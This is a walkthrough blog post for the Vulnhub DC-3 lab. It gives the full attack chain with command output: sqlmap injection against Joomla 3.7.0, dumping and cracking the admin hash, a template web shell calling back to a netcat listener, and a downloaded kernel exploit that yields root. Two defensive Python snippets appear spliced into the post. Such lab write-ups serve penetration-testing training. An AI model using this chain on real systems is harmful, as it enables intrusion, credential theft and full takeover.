Walkthrough: Vulnhub - DC: 3

· by Christoph Stoettner · Read in about 8 min · (1589 words)

TL;DR

Download and Information
Original Description

DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).

If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

Recon

nmap
root@kali:~/vulnhub/dc3# nmap -sn 10.128.1.150-200
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-06 14:13 EST
Nmap scan report for DC3VM.stoeps.lab (10.128.1.156)
Host is up (0.00095s latency).
MAC Address: 00:0C:29:7F:2F:B8 (VMware)

root@kali:~/vulnhub/dc3# nmap -A -p- 10.128.1.156
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-06 14:13 EST
Nmap scan report for DC3VM.stoeps.lab (10.128.1.156)
Host is up (0.0011s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 00:0C:29:7F:2F:B8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.12 ms DC3VM.stoeps.lab (10.128.1.156)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.40 seconds

A short check with the browser shows us a Joomla webpage. Let’s check the version and possible attacks.

joomscan
root@kali:~/vulnhub/dc3# apt install joomscan

root@kali:~/vulnhub/dc3# joomscan -u http://10.128.1.156

    ____  _____  _____  __  __  ___   ___    __    _  _
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  (
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)

    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://10.128.1.156 ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://10.128.1.156/administrator/components
http://10.128.1.156/administrator/modules
http://10.128.1.156/administrator/templates
http://10.128.1.156/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://10.128.1.156/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found

Your Report : reports/10.128.1.156/

Not as detailed as wpscan, but enough information for now. We know it’s Joomla 3.7.0.

searchsploit
root@kali:~/vulnhub/dc3# searchsploit joomla 3.7
----------------------------------------------------- ----------------------------------------
 Exploit Title                                       |  Path
                                                     | (/usr/share/exploitdb/)
----------------------------------------------------- ----------------------------------------
Joomla! 3.7 - SQL Injection                          | exploits/php/remote/44227.php
Joomla! 3.7.0 - 'com_fields' SQL Injection           | exploits/php/webapps/42033.txt

The file 42033.txt tells us that the list[fullordering] parameter of com_fields is injectable and even gives a ready-made sqlmap command.

42033.txt
...
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
  --dbs -p list[fullordering]
...
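As an added defender-side example (not part of the original post), this Python snippet scans Apache access log lines for com_fields requests whose list[fullordering] value is not a plain `column ASC|DESC` ordering, which is what the sqlmap probe from 42033.txt looks like in the web server log. The log lines, the client IP and the user agent are constructed, and the safe-value pattern is an assumption about what Joomla's own list views send.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format: ip ident user [ts] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Assumption: a benign Joomla ordering value is "<column> ASC|DESC", e.g. "a.name ASC".
SAFE_ORDERING = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]* (?:ASC|DESC)$', re.IGNORECASE)

# Constructed sample lines (not from the original post). The second and fourth carry
# the updatexml probe shown in 42033.txt; the user agent is deliberately ordinary,
# because sqlmap --random-agent hides itself there anyway.
SAMPLE_LOG = """\
10.128.1.20 - - [06/Jan/2020:14:30:01 -0500] "GET /administrator/index.php?option=com_fields&view=fields&list%5Bfullordering%5D=a.name+ASC HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.128.1.20 - - [06/Jan/2020:14:31:12 -0500] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml HTTP/1.1" 500 1024 "-" "Mozilla/5.0"
10.128.1.20 - - [06/Jan/2020:14:31:13 -0500] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
10.128.1.20 - - [06/Jan/2020:14:31:14 -0500] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%281%2C1%2C1%29 HTTP/1.1" 500 1024 "-" "Mozilla/5.0"
"""

def check_request(path):
    """Return a reason if the request abuses the com_fields ordering parameter, else None."""
    parts = urlsplit(path)
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes %5B..%5D and '+' for us
    if qs.get("option") != ["com_fields"]:
        return None
    for value in qs.get("list[fullordering]", []):
        if not SAFE_ORDERING.match(value.strip()):
            return f"unexpected list[fullordering] value: {value!r}"
    return None

def scan_log(text):
    """Parse combined-format lines and return (ip, timestamp, path, reason) per suspicious hit."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = check_request(m["path"])
        if reason:
            hits.append((m["ip"], m["ts"], m["path"], reason))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```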

Attack Joomla

SQLMAP

Get databases
sqlmap -u "http://10.128.1.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
  -p list[fullordering] --dbs

...
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
...
Get tables
sqlmap -u "http://10.128.1.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
  -p list[fullordering] -D joomladb --tables

...
Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| ...                 |
| #__usergroups       |
| #__users            | (1)
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+
...
(1) the user table
Dump table
sqlmap -u "http://10.128.1.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
  -p list[fullordering] -D joomladb -T \#__users --dump

...
[14:39:05] [WARNING] unable to retrieve column names for table '#__users' in database 'joomladb'
[14:39:05] [INFO] fetching entries for table '#__users' in database 'joomladb'
[14:39:05] [INFO] used SQL query returns 1 entry
[14:39:05] [INFO] resumed: '0'
[14:39:05] [INFO] resumed: '0'
[14:39:05] [INFO] resumed: 'freddy@norealaddress.net'
[14:39:05] [INFO] resumed: '629'
[14:39:05] [INFO] resumed: '2019-04-01 20:27:08'
[14:39:05] [INFO] resumed: 'admin'      (1)
[14:39:05] [INFO] resumed: '{"admin_style":"","admin_language":"","language":"","editor":""...
[14:39:05] [INFO] resumed: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' (2)
[14:39:05] [INFO] resumed: '2019-03-23 09:44:38'
[14:39:05] [INFO] resumed: '1'
[14:39:05] [INFO] resumed: 'admin'
Database: joomladb
Table: #__users
[1 entry]
(1) Username
(2) Hash

I put the user and hash into a text file named user.

user
admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

And run john the ripper on the file.

root@kali:~/vulnhub/dc3# john user
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single

...

Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
snoopy           (admin)      (1)
1g 0:00:00:08 DONE 2/3 (2020-01-06 14:03) 0.1226g/s 108.5p/s 108.5c/s 108.5C/s 123456..buster
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root@kali:~/vulnhub/dc3# john --show user
admin:snoopy    (2)

1 password hash cracked, 0 left
(1) got the password
(2) Joomla login credentials
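As an added example that is not from the original post, the following Python code parses the dumped #__users hash into its bcrypt parts, which explains john's `Cost 1 (iteration count) is 1024` line (2^10), and audits a constructed set of rows for hashes below an assumed minimum cost. The legacy md5:salt branch covers the pre-bcrypt Joomla format; the min_cost=12 policy is an assumption, not a Joomla setting.

```python
import re

# bcrypt as Joomla 3.2+ stores it: $2y$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(r'^\$(2[aby])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$')
# Older Joomla releases stored md5(password + salt):salt with a 16-character salt.
LEGACY_RE = re.compile(r'^([0-9a-f]{32}):([A-Za-z0-9]{16})$')

def inspect_hash(stored, min_cost=12):
    """Classify one #__users.password value; min_cost=12 is an assumed policy, not a Joomla default."""
    m = BCRYPT_RE.match(stored)
    if m:
        variant, cost, salt, digest = m.groups()
        cost = int(cost)
        return {
            "scheme": f"bcrypt-{variant}",
            "cost": cost,
            "iterations": 2 ** cost,  # the value john reports as 'Cost 1 (iteration count)'
            "salt": salt,
            "weak": cost < min_cost,
        }
    m = LEGACY_RE.match(stored)
    if m:
        return {"scheme": "md5-salted", "cost": None, "iterations": 1, "salt": m.group(2), "weak": True}
    return {"scheme": "unknown", "cost": None, "iterations": None, "salt": None, "weak": True}

def audit_users(rows, min_cost=12):
    """rows: (username, stored_hash) pairs as dumped from #__users; returns accounts to re-hash."""
    findings = []
    for username, stored in rows:
        info = inspect_hash(stored, min_cost)
        if info["weak"]:
            findings.append((username, info["scheme"], info["cost"]))
    return findings

# The admin row is the hash from the dump above; the other two rows are constructed.
SAMPLE_ROWS = [
    ("admin", "$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu"),
    ("editor", "$2y$12$" + "a" * 53),                      # cost 12, meets the assumed policy
    ("legacy", "0123456789abcdef" * 2 + ":" + "s" * 16),  # pre-bcrypt format, always weak
]

if __name__ == "__main__":
    for username, scheme, cost in audit_users(SAMPLE_ROWS):
        print(f"{username}: {scheme} cost={cost} -> should be re-hashed at next login")
```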

Remote Shell

Log in to Joomla and go to Extensions → Templates. Replace the index.php of the active template with the code from /usr/share/webshells/php/php-reverse-shell.php, changing only the IP address to the one your netcat listener runs on.

Now run nc -nlvp 1234 on Kali and open the Joomla page again.

Once the connection comes back, upgrade it to a proper tty:

python3 -c 'import pty;pty.spawn("/bin/bash")'

www-data@DC3VM:/tmp$ uname -a
Linux DC3VM 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

www-data@DC3VM:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial

Exploit and root flag

I searched for sudoers entries, sticky bit binaries and other common ways to get root. Finally I decided to use a kernel exploit.

searchsploit
root@kali:~/vulnhub/dc3# searchsploit ubuntu 16.04
----------------------------------------------------------------------------------------------------------------------- --------------------------------------
 Exploit Title                                                                                                         |  Path
                                                                                                                       | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------- --------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution                                                       | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation                                                          | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download   | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation                                              | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Sta | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privile | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps                                                  | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read                              | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)                                        | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak                                     | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                       | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation                  | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation         | exploits/linux/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                           | exploits/linux/local/39772.txt (1)
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation                                 | exploits/linux/local/40489.txt
(1) This one finally worked

DC-3 is a 32-bit machine (i686, see the uname output above), so we can save time and skip the 64-bit exploits.

Compile and run exploit
www-data@DC3VM:/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

Saving to: '39772.zip'

39772.zip           100%[===================>]   6.86K  --.-KB/s    in 0.001s

2020-01-07 07:07:00 (11.2 MB/s) - '39772.zip' saved [7025/7025]

www-data@DC3VM:/tmp$ unzip 39772.zip

www-data@DC3VM:/tmp$ cd 39772
www-data@DC3VM:/tmp/39772$ ls
crasher.tar  exploit.tar

www-data@DC3VM:/tmp/39772$ tar -xvf exploit.tar
www-data@DC3VM:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit
www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput.c  hello.c  suidhelper.c

www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ sh compile.sh   (1)

doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c

www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput

starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...

root@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC3VM:/root# ls
ls
the-flag.txt
(1) Compiling throws two warnings, but the exploit works

The flag

root@DC3VM:/root# cat the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order for completing DC-3VM.  :-)

I hope you've enjoyed this challenge as much as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

Final thoughts

This time we had to use sqlmap for the first steps, and it was the first machine without additional flags, unlike DC-1 and DC-2.

Thanks to @DCAU7! Looking forward to the other machines in the DC series.